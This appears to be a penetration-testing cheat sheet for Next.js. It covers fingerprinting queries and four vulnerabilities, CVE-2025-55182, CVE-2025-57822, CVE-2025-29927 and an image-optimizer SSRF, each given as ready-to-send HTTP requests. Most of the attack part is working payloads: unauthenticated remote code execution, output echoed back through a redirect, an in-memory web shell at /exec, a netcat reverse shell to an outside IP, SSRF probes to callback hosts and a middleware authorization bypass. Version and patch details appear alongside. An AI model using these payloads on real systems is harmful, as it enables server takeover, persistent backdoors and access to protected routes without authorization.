1. Next.js overview
https://nextjs.org/docs
Next.js is a full-featured web application framework built on React, developed and maintained by Vercel (formerly Zeit). It streamlines React development while shipping server-side rendering (SSR), static site generation (SSG), API routes, image optimization, TypeScript support and a file-system router out of the box. From a testing standpoint the interesting surfaces are precisely those server-side features: the Server Action / RSC (React Server Components) payload decoder, the image optimizer behind /_next/image, and middleware. Each of them shows up in the findings below.
Typical App Router project layout:

```text
my-next-app/
├── app/                      # new routing system (App Router)
│   ├── layout.tsx            # root or nested route layout
│   ├── page.tsx              # home page
│   ├── dashboard/
│   │   └── page.tsx          # /dashboard route
│   └── api/
│       └── hello/route.ts    # API route (App Router style)
├── public/                   # static assets (e.g. favicon.ico)
├── next.config.js            # configuration file
└── package.json
```

Middleware, when present, lives in middleware.ts next to app/ (or in src/middleware.ts when the project uses a src/ directory); whether it sits at the root or under src/ matters for the header value used in 3.4.
2. Common fingerprints

Cyberspace search engine (Hunter/FOFA-style) query:

```text
app.name="Next.js" || web.body="/_next/static/chunks/app/"
```

Other indicators on the wire: asset paths under /_next/static/ (the chunks/app/ subtree specifically means the App Router is in use, which is what 3.1 needs), an X-Powered-By: Next.js response header unless poweredByHeader is disabled in next.config.js, the /_next/image optimizer endpoint, and a <script id="__NEXT_DATA__"> block in server-rendered Pages Router HTML.
3. Common vulnerabilities
3.1. Latest 0-day: CVE-2025-55182
https://mp.weixin.qq.com/s/lSG9bsq0OBsMpPeEIaGNMQ
CVE-2025-55182 is an unauthenticated remote code execution bug in the React Server Components ("Flight") deserializer that decodes Server Action arguments. The decoder resolves `$`-prefixed reference strings in the multipart form body against the attacker-supplied chunk graph without checking what they point at, so a crafted body can walk `__proto__` and `constructor` chains (`$1:constructor:constructor` reaches `Function`) and have the string placed in `_prefix` compiled and executed on the server. No real Server Action is needed: in affected versions the body is decoded before the action ID from the `Next-Action` header is looked up, so any value (`x` below) works.
**Next.js (App Router users):** because Next.js embeds RSC directly, the following versions are affected (Vercel first tracked this as CVE-2025-66478, later withdrawn as a duplicate of CVE-2025-55182):
- Next.js v15.0.0 - v15.0.4
- Next.js v15.1.0 - v15.1.8
- Next.js v15.2.x - v15.5.6
- Next.js v16.0.0 - v16.0.6
- Next.js v14.3.0-canary.77 and later canary builds
Fixed releases are 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 and 16.0.7. Applications that only use the Pages Router are not affected. In all PoCs below the Content-Length values are stale copies; recompute them for the actual body (Burp Repeater does this automatically), and note that the X-Nextjs-* headers are markers from the Assetnote scanner, not something the exploit needs.
1. Non-echo PoC:
```http
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```

This variant returns nothing to the client, and `xcalc` only helps against a desktop target. On a server, confirm execution through a side effect you can observe, such as a DNS or HTTP callback to an OAST host; avoid sleep-based confirmation for the reason given in the note at the end of this section.
2. Echo PoC

The echo variant throws the same NEXT_REDIRECT error that Next.js uses internally for redirect(). Its digest, NEXT_REDIRECT;push;/login?a=<output>;307;, is honoured by the action handler, so the command output comes back in the redirect target: the Location header of the redirect response for a form-style POST like this one, or the x-action-redirect header when the request is sent as a fetch action with Accept: text/x-component. The digest fields are separated by ";", so output containing a semicolon is cut off at that point. Any App Router route works as the path; /apps is just the one used here.

```http
POST /apps HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
3. Planting an in-memory shell

The payload hooks http.Server.prototype.emit in the running Node process, so every 'request' event passes through the hook before Next.js sees it. Requests to /exec are answered directly with the output of the cmd parameter (run with the asynchronous exec, so the event loop is not blocked) and never reach the framework; everything else falls through to the original emit. The hook lives only in that process: it disappears on restart or redeploy, and it is reachable by anyone who can talk to the port, so remove it or restart the service once testing is done.

```http
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"(async()=>{const http=await import('node:http');const url=await import('node:url');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const parsedUrl=url.parse(req.url,true);if(parsedUrl.pathname==='/exec'){const cmd=parsedUrl.query.cmd||'whoami';cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```

Usage: GET /exec?cmd=whoami
4. Reverse shell

Two practical points about this payload. First, `nc -c` needs a netcat build with command support (netcat-traditional or ncat); the OpenBSD nc shipped by many distributions has neither -c nor -e, so have a bash /dev/tcp one-liner ready as a fallback. Second, execSync does not return while the shell is connected, so the Next.js process stops serving every other request for the duration of the session (see the note below); run the connect-back in the background or through the asynchronous exec instead.

```http
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 588

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('nc -c sh 192.168.50.226 4444');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
Note: while verifying the bug, avoid running commands that may block through execSync (ping, curl or wget without timeouts, interactive shells). Node.js uses a single-threaded event loop, and execSync blocks that loop until the child exits, so every other request to the application stalls and the outage is immediately visible. Use the asynchronous exec instead, as the in-memory shell payload above does, and give commands an explicit timeout.
3.2. Next.js image component SSRF
https://deepstrike.io/blog/nextjs-security-testing-bug-bounty-guide
The next/image component is served by the built-in optimizer at /_next/image?url=<src>&w=<width>&q=<quality>, which fetches the source image server-side. Absolute URLs are accepted only when they match images.remotePatterns (or the deprecated images.domains) in next.config.js; a wildcard such as hostname: "**" turns the optimizer into an open fetch proxy. Relative URLs (starting with "/") are fetched from the application itself, which is the variant to try against internal routes. Two constraints apply when probing: url must be an absolute http(s) URL or start with "/" (a bare hostname, as in the first capture, is rejected as an invalid url parameter), and w must be one of the configured deviceSizes/imageSizes (the defaults include 16 and 640, not 1) with q between 1 and 100, otherwise the optimizer answers 400 before fetching anything. The x-middleware-subrequest and Location headers in the captures below belong to the tests in 3.3 and 3.4 and play no part here.

```http
GET /_next/image?url=5syrggwbtvnlia85n5fu5shaz15stlha.oastify.com HTTP/1.1
Host: test.college.jiaqingren.net:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
Location: http://pngbb0rvofi5du3pipae0ccuul0co4ct.oastify.com
Referer: http://test.college.jiaqingren.net:8001/
```

```http
GET /_next/image?url=/path&w=1&q=75 HTTP/1.1
Host: test.college.jiaqingren.net:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
Location: http://pngbb0rvofi5du3pipae0ccuul0co4ct.oastify.com
Referer: http://test.college.jiaqingren.net:8001/
```
3.3. CVE-2025-57822 SSRF
https://mp.weixin.qq.com/s/acQrWzVDo7QLgaOHYKq97w
Cause: an unsanitized request header. When the application's middleware passes client-controlled request headers through into the response it returns (for example by copying request.headers when building the NextResponse.next() response), a client-supplied Location header lands in that response, and affected Next.js versions treated it as a redirect to follow server-side. The probe is therefore a single request with a Location header pointing at a host you control; a callback on the OAST domain confirms the server followed it. The precondition matters: if the middleware does not forward request headers, the header is simply ignored. Fixed in Next.js 14.2.32 and 15.4.7. The capture below still carries the x-middleware-subrequest header from the 3.4 test; drop it here, because on a version vulnerable to 3.4 it skips middleware entirely and with it the code path this bug depends on.

```http
GET / HTTP/1.1
Host: test.college.jiaqingren.net:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
Location: http://pngbb0rvofi5du3pipae0ccuul0co4ct.oastify.com
```
3.4. CVE-2025-29927 authorization bypass
https://mp.weixin.qq.com/s/f1JxoeZnxqboN39PaZq9NQ
Next.js uses the internal x-middleware-subrequest header to stop middleware from recursing into itself. Before the fix the check trusted that header on external requests too, so a client that sends it skips middleware entirely, including any authentication or authorization check implemented there. The value has to match what the version expects: pages/_middleware for 11.1.4 through 12.1; middleware (or src/middleware when the file lives under src/) for 12.2 through 13.x; and the name repeated five times, middleware:middleware:middleware:middleware:middleware, for 14.x and 15.x, which compare the header against a recursion depth of 5. Fixed in 12.3.5, 13.5.9, 14.2.25 and 15.2.3; until then, strip the header at the reverse proxy, since nothing outside the process has a legitimate reason to send it. Only self-hosted deployments are exposed; Vercel and Netlify filtered the header at the edge. A quick check: request a route that middleware is supposed to protect with and without the header and compare status codes and bodies.

```text
// Affected versions
11.1.4 <= Next.js <= 13.5.6   (pages/_middleware, or middleware from 12.2 on)
14.0.0 <= Next.js <  14.2.25  (middleware repeated five times)
15.0.0 <= Next.js <  15.2.3   (middleware repeated five times)
```

```http
GET / HTTP/1.1
Host: test.college.jiaqingren.net:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```